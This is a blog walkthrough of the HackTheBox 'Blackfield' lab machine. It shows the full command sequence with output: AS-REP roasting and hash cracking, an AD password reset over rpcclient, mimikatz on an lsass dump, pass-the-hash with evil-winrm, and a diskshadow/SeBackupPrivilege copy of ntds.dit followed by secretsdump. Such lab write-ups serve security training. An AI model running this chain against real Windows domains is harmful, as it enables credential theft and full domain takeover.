BLACKFIELD HACKTHEBOX HACKTHEBOX

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 19:13 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 19:13
    Completed NSE at 19:13, 0.00s elapsed
    Initiating NSE at 19:13
    Completed NSE at 19:13, 0.00s elapsed
    Initiating NSE at 19:13
    Completed NSE at 19:13, 0.00s elapsed
    Initiating Ping Scan at 19:13
    Scanning 10.10.10.192 [4 ports]
    Completed Ping Scan at 19:13, 0.60s elapsed (1 total hosts)
    Initiating SYN Stealth Scan at 19:13
    Scanning blackfield.htb (10.10.10.192) [1000 ports]
    Discovered open port 445/tcp on 10.10.10.192
    Discovered open port 53/tcp on 10.10.10.192
    Discovered open port 139/tcp on 10.10.10.192
    Discovered open port 135/tcp on 10.10.10.192
    Discovered open port 88/tcp on 10.10.10.192
    Discovered open port 593/tcp on 10.10.10.192
    Discovered open port 3268/tcp on 10.10.10.192
    Discovered open port 389/tcp on 10.10.10.192
    Completed SYN Stealth Scan at 19:13, 24.70s elapsed (1000 total ports)
    Initiating Service scan at 19:13
    Scanning 8 services on blackfield.htb (10.10.10.192)
    Completed Service scan at 19:16, 156.27s elapsed (8 services on 1 host)
    Initiating OS detection (try #1) against blackfield.htb (10.10.10.192)
    Retrying OS detection (try #2) against blackfield.htb (10.10.10.192)
    Initiating Traceroute at 19:16
    Completed Traceroute at 19:16, 0.73s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 19:16
    Completed Parallel DNS resolution of 2 hosts. at 19:16, 0.60s elapsed
    NSE: Script scanning 10.10.10.192.
    Initiating NSE at 19:16
    Completed NSE at 19:17, 40.10s elapsed
    Initiating NSE at 19:17
    Completed NSE at 19:17, 3.22s elapsed
    Initiating NSE at 19:17
    Completed NSE at 19:17, 0.00s elapsed
    Nmap scan report for blackfield.htb (10.10.10.192)
    Host is up (0.51s latency).
    Not shown: 992 filtered ports
    PORT     STATE SERVICE       VERSION
    53/tcp   open  domain?
    | fingerprint-strings: 
    |   DNSVersionBindReqTCP: 
    |     version
    |_    bind
    88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-07-10 20:49:11Z)
    135/tcp  open  msrpc         Microsoft Windows RPC
    139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
    389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
    445/tcp  open  microsoft-ds?
    593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port53-TCP:V=7.80%I=7%D=7/10%Time=5F0870AA%P=x86_64-pc-linux-gnu%r(DNSV
    SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
    SF:x04bind\0\0\x10\0\x03");
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
    No OS matches for host
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=260 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: 7h05m04s
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled and required
    | smb2-time: 
    |   date: 2020-07-10T20:51:52
    |_  start_date: N/A

    TRACEROUTE (using port 445/tcp)
    HOP RTT       ADDRESS
    1   721.31 ms 10.10.14.1
    2   721.43 ms blackfield.htb (10.10.10.192)

    NSE: Script Post-scanning.
    Initiating NSE at 19:17
    Completed NSE at 19:17, 0.00s elapsed
    Initiating NSE at 19:17
    Completed NSE at 19:17, 0.00s elapsed
    Initiating NSE at 19:17
    Completed NSE at 19:17, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 235.29 seconds
            Raw packets sent: 2093 (95.776KB) | Rcvd: 111 (7.997KB)

PORT ENUMERATION

PORT 445

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
    └──╼ #smbclient -L 10.10.10.192
    Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        profiles$       Disk      
        SYSVOL          Disk      Logon server share 
        z               Disk      
    SMB1 disabled -- no workgroup available

Further we will check PROFILES

┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #smbclient \\\\10.10.10.192\\profiles$
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jun  3 22:17:12 2020
  ..                                  D        0  Wed Jun  3 22:17:12 2020
  AAlleni                             D        0  Wed Jun  3 22:17:11 2020
  ABarteski                           D        0  Wed Jun  3 22:17:11 2020
  ABekesz                             D        0  Wed Jun  3 22:17:11 2020
  ABenzies                            D        0  Wed Jun  3 22:17:11 2020
  ABiemiller                          D        0  Wed Jun  3 22:17:11 2020
  AChampken                           D        0  Wed Jun  3 22:17:11 2020
  
  <---->

Here we have Names So I just created a Users list and we know that for kerberos enumeartion we need users for it. So I just ran this list against that Kerb Script GetNPUsers.py

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
    └──╼ #python GetNPUsers.py blackfield.local/ -usersfile user.txt -dc-ip 10.10.10.192 -no-pass
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

    <---->

    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    $krb5asrep$23$support@BLACKFIELD.LOCAL:f740efb0de3b25d7772ffa79327a9774$bf66496d2586b4c4e88d093f23ced3da37775a3ac7383f264b94b15615bb2cc4d4135afb6d09846829caac8a5a248193ad2cea818f68b44f62af6ff3e959fd9c33565a61ed7a9da1d03e2ca3f62a0550d884b278c37979425b44d85109caaac4383b7677d08b560013ff2f530cebbffb0adc43c27ad2a0e7d1f826eddd13f7035413514c8047e6994970bbcb97928caa116148dc8ed918bdd60c06ded06ea66af321fe369239bffe5e6d6419e4f44b98c9bec1af1c24bad8a997fecaad188a53a09030ad71b53bb5e15b3555d90e071ae7116357c33be0ccce0aebe459f5435f708fa75792881ce6ac3a7f734ee457e3283fcf60
    [-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

    <---->

After cracking this hash using HASHCAT

    ┌─[root@liquid]─[~/Desktop/HTB/blackfield]
    └──╼ #hashcat -m 18200 -a 0 kerbhash ../../THM/Wordlists/rockyou.txt --force --show
    $krb5asrep$23$support@BLACKFIELD.LOCAL:fad1ab0da848d218949d3da5661c74ad$8a5cd1423dab835c437cd8109d3339f511843122c04a914ada392308d3610605603d48350a03e18c5763cd61fecb0ffb4e48eaf3bcd45e059fe3f92071f3cd0549a3c29c2a0c2ea5b4e6f30ed63ab4005029e9496d7b8f376bea3bd65f3086d1e9b36674ed16c33feca721d40f64db3bd0c8cdd46df79849ffef9c481cddd78bd6b9d027b3ad5a68b6f00190d9c3ebe0e63913a087b48991baaded76086368a483c3b4f1658d9fb336648f145780c2f4535707ed6110ee5ff9623330c25680aa17c20dd885d6a4a88d93f98dcc8359fb32a876dc9263be6facc8cb3e44ec1d681e94df3c18b6febfb94ff19a7c8a7a3a0b891b8a:#00^BlackKnight

I tried this password against EVIL_WINRM , SMBCLIENT , RPCCLIENT It worked againat SMB and RPC . I got Usefull information in RPCCLIENT .

┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #rpcclient -U support 10.10.10.192
Enter WORKGROUP\support's password: 

rpcclient $> 
rpcclient: missing argument
rpcclient $> dir
command not found: dir
rpcclient $> enumdomusers 
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
user:[BLACKFIELD189208] rid:[0x453]
user:[BLACKFIELD404458] rid:[0x454]
user:[BLACKFIELD706381] rid:[0x455]
user:[BLACKFIELD937395] rid:[0x456]
user:[BLACKFIELD553715] rid:[0x457]

<--->

Here I just enumerated Privileges:

┌─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #rpcclient -U support 10.10.10.192
Enter WORKGROUP\support's password: 

rpcclient $> 
rpcclient: missing argument
rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege 		0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 		0:3 (0x0:0x3)
SeLockMemoryPrivilege 		0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 		0:5 (0x0:0x5)
SeMachineAccountPrivilege 		0:6 (0x0:0x6)
SeTcbPrivilege 		0:7 (0x0:0x7)
SeSecurityPrivilege 		0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 		0:9 (0x0:0x9)
SeLoadDriverPrivilege 		0:10 (0x0:0xa)
SeSystemProfilePrivilege 		0:11 (0x0:0xb

<---->

So From above Privs and help from my friend I came to know that I can change password for user in AD. Which looks like this

https://malicious.link/post/2017/reset-ad-user-password-with-linux/

 ┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
    └──╼ #rpcclient -U support 10.10.10.192
    Enter WORKGROUP\support's password: 
    rpcclient $> setuserinfo2 audit2020 23 'liquid12@@#'
    rpcclient $> 

Here you need to set password which is complex otherwise you may get error!!.So lets get back to smbclient To access other shares!!.Share which i Got usefull which had some data and accessed by User audit2020 is forensic .Their is folder which has lsass zip which stores Hashes So Lets Get that ZIP out.

<!-- wp:syntaxhighlighter/code -->
<pre class="wp-block-syntaxhighlighter-code">┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #smbclient -U audit2020 \\\\10.10.10.192\\forensic
Enter WORKGROUP\audit2020's password: 
Try "help" to get a list of possible commands.
smb: \> cd memory_analysis\
smb: \memory_analysis\> dir
.                                   D        0  Fri May 29 01:58:33 2020
..                                  D        0  Fri May 29 01:58:33 2020
conhost.zip                         A 37876530  Fri May 29 01:55:36 2020
ctfmon.zip                          A 24962333  Fri May 29 01:55:45 2020
dfsrs.zip                           A 23993305  Fri May 29 01:55:54 2020
dllhost.zip                         A 18366396  Fri May 29 01:56:04 2020
ismserv.zip                         A  8810157  Fri May 29 01:56:13 2020
lsass.zip                           A 41936098  Fri May 29 01:55:08 2020
mmc.zip                             A 64288607  Fri May 29 01:55:25 2020
RuntimeBroker.zip                   A 13332174  Fri May 29 01:56:24 2020
ServerManager.zip                   A 131983313  Fri May 29 01:56:49 2020
sihost.zip                          A 33141744  Fri May 29 01:57:00 2020
smartscreen.zip                     A 33756344  Fri May 29 01:57:11 2020
svchost.zip                         A 14408833  Fri May 29 01:57:19 2020
taskhostw.zip                       A 34631412  Fri May 29 01:57:30 2020
winlogon.zip                        A 14255089  Fri May 29 01:57:38 2020
wlms.zip                            A  4067425  Fri May 29 01:57:44 2020
WmiPrvSE.zip                        A 18303252  Fri May 29 01:57:53 2020

        7846143 blocks of size 4096. 3931591 blocks available
smb: \memory_analysis\> </pre>
<!-- /wp:syntaxhighlighter/code -->

https://ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz

First Download zip file and after extratcing you will get lsass.DMP.

Just open UP mimikatz and use this command :

After that run this

sekurlsa::logonPasswords

You will get your HASH for user SVC_BACKUP

GETTING USER ACCESS

    ┌─[root@liquid]─[~/Desktop/HTB/blackfield]
    └──╼ #evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

    Evil-WinRM shell v2.3

    Info: Establishing connection to remote endpoint

    *Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../Desktop
    *Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls


        Directory: C:\Users\svc_backup\Desktop


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    d-----        7/10/2020  10:01 AM                tmp
    -ar---        7/10/2020   5:04 AM             34 user.txt

So Lets search for Privilege escalation

    *Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /all

    USER INFORMATION
    ----------------

    User Name             SID
    ===================== ==============================================
    blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


    GROUP INFORMATION
    -----------------

    Group Name                                 Type             SID          Attributes
    ========================================== ================ ============ ==================================================
    Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
    BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
    BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
    BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
    BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
    Mandatory Label\High Mandatory Level       Label            S-1-16-12288


    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                    State
    ============================= ============================== =======
    SeMachineAccountPrivilege     Add workstations to domain     Enabled
    SeBackupPrivilege             Back up files and directories  Enabled
    SeRestorePrivilege            Restore files and directories  Enabled
    SeShutdownPrivilege           Shut down the system           Enabled
    SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


    USER CLAIMS INFORMATION
    -----------------------

    User claims unknown.

    Kerberos support for Dynamic Access Control on this device has been disabled.

GETTING ROOT ACCESS

In Brief what we are going to do is that we will just create a copy of C directory into new one then we will get files from their as we are solving AD room so we will get AD password stored file NDTS from where we will get hash and also we need system.hive file to get our secretsdump script from impackets could work and we will get hash !!

SCRIPT WHICH WILL CREATE NEW DIRECTORY COPY OF C DIRECTORY :

set context persistent nowriters#

add volume C: alias test#

create#

expose %test% g:#

    *Evil-WinRM* PS C:\Users\svc_backup\Desktop> cd ../../../
    *Evil-WinRM* PS C:\> mkdir temp
    cd temp
    upload di

        Directory: C:\

    s
    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    d-----        7/10/2020   4:07 PM                temp


    *Evil-WinRM* PS C:\> cd temp
    *Evil-WinRM* PS C:\temp> upload diskexploit.txt
    Info: Uploading diskexploit.txt to C:\temp\diskexploit.txt

                                                                
    Data: 112 bytes of 112 bytes copied

    Info: Upload successful!

    *Evil-WinRM* PS C:\temp> ls


        Directory: C:\temp


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -a----        7/10/2020   4:08 PM             86 diskexploit.txt


    *Evil-WinRM* PS C:\temp> diskshadow /s diskexploit.txt
    Microsoft DiskShadow version 1.0
    Copyright (C) 2013 Microsoft Corporation
    On computer:  DC01,  7/10/2020 4:09:11 PM

    -> set context persistent nowriters
    -> add volume C: alias new1
    -> create
    Alias new1 for shadow ID {6067a30e-a018-4980-b41f-7c734e81b825} set as environment variable.
    Alias VSS_SHADOW_SET for shadow set ID {534f88ab-b505-4e7f-ab7e-5c545f423da1} set as environment variable.

    Querying all shadow copies with the shadow copy set ID {534f88ab-b505-4e7f-ab7e-5c545f423da1}

        * Shadow copy ID = {6067a30e-a018-4980-b41f-7c734e81b825}		%new1%
            - Shadow copy set: {534f88ab-b505-4e7f-ab7e-5c545f423da1}	%VSS_SHADOW_SET%
            - Original count of shadow copies = 1
            - Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
            - Creation time: 7/10/2020 4:09:12 PM
            - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3
            - Originating machine: DC01.BLACKFIELD.local
            - Service machine: DC01.BLACKFIELD.local
            - Not exposed
            - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
            - Attributes:  No_Auto_Release Persistent No_Writers Differential

    Number of shadow copies listed: 1
    -> expose %new1% g:
    -> %new1% = {6067a30e-a018-4980-b41f-7c734e81b825}
    The shadow copy was successfully exposed as g:\.
    ->
    *Evil-WinRM* PS C:\temp> g:
    *Evil-WinRM* PS G:\> ls


        Directory: G:\


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    d-----        5/26/2020   5:38 PM                PerfLogs
    d-----         6/3/2020   9:47 AM                profiles
    d-r---        3/19/2020  11:08 AM                Program Files
    d-----         2/1/2020  11:05 AM                Program Files (x86)
    d-----        7/10/2020   4:08 PM                temp
    d-r---        2/23/2020   9:16 AM                Users
    d-----        5/28/2020   9:34 AM                Windows


    cd Window*Evil-WinRM* PS G:\> cd Windows
    ls
    *Evil-WinRM* PS G:\Windows> ls


        Directory: G:\Windows


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----

    <---->

    d-----        9/15/2018  12:19 AM                diagnostics
    d-----        9/15/2018   2:08 AM                DigitalLocker
    d---s-        9/15/2018  12:19 AM                Downloaded Program Files
    d-----        9/15/2018  12:19 AM                drivers
    d-----        9/15/2018   2:08 AM                en-US
    d-r-s-         9/6/2019   5:31 PM                Fonts
    d-----        9/15/2018  12:19 AM                Globalization
    d-----        9/15/2018   2:08 AM                Help
    d-----        9/15/2018  12:19 AM                IdentityCRL
    d-----        9/15/2018   2:08 AM                IME
    d-r---        2/28/2020   4:26 PM                ImmersiveControlPanel
    d-----        7/10/2020   9:41 AM                INF
    d-----        9/15/2018  12:19 AM                InputMethod
    d-----        9/15/2018  12:19 AM                L2Schemas
    d-----        9/15/2018  12:19 AM                LiveKernelReports
    d-----        5/26/2020   5:36 PM                Logs
    d-r-s-        9/15/2018  12:19 AM                media
    d-r---        7/10/2020   4:58 AM                Microsoft.NET
    d-----        9/15/2018  12:19 AM                Migration
    d-----        9/15/2018  12:19 AM                ModemLogs
    d-----        7/10/2020   4:47 AM                NTDS
    d-----        9/15/2018   2:09 AM                OCR
    d-r---        9/15/2018  12:19 AM                Offline Web Pages
    d-----         2/1/2020   7:55 PM                Panther

    <---->


    *Evil-WinRM* PS G:\Windows> cd NTDS
    *Evil-WinRM* PS G:\Windows\NTDS> ls


        Directory: G:\Windows\NTDS


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -a----         6/6/2020   8:35 AM           8192 edb.chk
    -a----        7/10/2020   4:02 PM       10485760 edb.log
    -a----        2/23/2020   9:41 AM       10485760 edb00003.log
    -a----        2/23/2020   9:41 AM       10485760 edb00004.log
    -a----        2/23/2020   9:41 AM       10485760 edb00005.log
    -a----        2/23/2020   3:13 AM       10485760 edbres00001.jrs
    -a----        2/23/2020   3:13 AM       10485760 edbres00002.jrs
    -a----        2/23/2020   9:42 AM       10485760 edbtmp.log
    -a----        7/10/2020   4:47 AM       18874368 ntds.dit
    -a----        7/10/2020  11:18 AM          16384 ntds.jfm
    -a----        7/10/2020   4:47 AM         434176 temp.edb

    *Evil-WinRM* PS G:\Windows\NTDS> c:
    *Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeUtils.dll
    Info: Uploading SeBackupPrivilegeUtils.dll to C:\temp\SeBackupPrivilegeUtils.dll

                                                                
    Data: 21844 bytes of 21844 bytes copied

    Info: Upload successful!

    *Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeCmdLets.dll
    Info: Uploading SeBackupPrivilegeCmdLets.dll to C:\temp\SeBackupPrivilegeCmdLets.dll

                                                                
    Data: 16384 bytes of 16384 bytes copied

    Info: Upload successful!

    *Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeCmdLets.dll
    *Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeUtils.dll
    *Evil-WinRM* PS C:\temp> Copy-FileSebackupPrivilege g:\Windows\NTDS\ntds.dit C:\temp\ndts.dit
    *Evil-WinRM* PS C:\temp> ls


        Directory: C:\temp


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -a----        7/10/2020   4:09 PM            610 2020-07-10_16-09-12_DC01.cab
    -a----        7/10/2020   4:08 PM             86 disk_shadow.txt
    -a----        7/10/2020   4:50 PM       18874368 ndts.dit
    -a----        7/10/2020   4:10 PM          45056 sam.hive
    -a----        7/10/2020   4:49 PM          12288 SeBackupPrivilegeCmdLets.dll
    -a----        7/10/2020   4:48 PM          16384 SeBackupPrivilegeUtils.dll
    -a----        7/10/2020   4:10 PM       17346560 system.hive



    *Evil-WinRM* PS G:\Windows\NTDS> reg save HKLM\SYSTEM c:\temp\system.hive
    The operation completed successfully.

    *Evil-WinRM* PS G:\Windows\NTDS> Reg save HKLM\SAM c:\temp\sam.hive
    The operation completed successfully.

    *Evil-WinRM* PS G:\Windows\NTDS> c:
    *Evil-WinRM* PS C:\temp> ls


        Directory: C:\temp


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -a----        7/10/2020   4:09 PM            610 2020-07-10_16-09-12_DC01.cab
    -a----        7/10/2020   4:08 PM             86 diskexploit.txt
    -a----        7/10/2020   4:10 PM          45056 sam.hive
    -a----        7/10/2020   4:10 PM       17346560 system.hive

Here we will just download every file on our PC anmd run this command!!

    ┌─[root@liquid]─[~/Desktop/HTB/blackfield]
    └──╼ #python secretsdump.py -ntds ntds.dit -system system.hive local
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

    [*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393

You Will get hash for administrator :

184fb5e5178480be64824d4cd53b99ee : administrator

    ┌─[root@liquid]─[~/Desktop/HTB/blackfield]
    └──╼ #evil-winrm -u administrator -H 184fb5e5178480be64824d4cd53b99ee -i 10.10.10.192

    Evil-WinRM shell v2.3

    Info: Establishing connection to remote endpoint

    *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
    blackfield\administrator
    *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
    *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
    c4809e0a73899ca82249b1b973c8527e
    *Evil-WinRM* PS C:\Users\Administrator\Desktop> 

So This machine was all about ENUMERATION !!

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: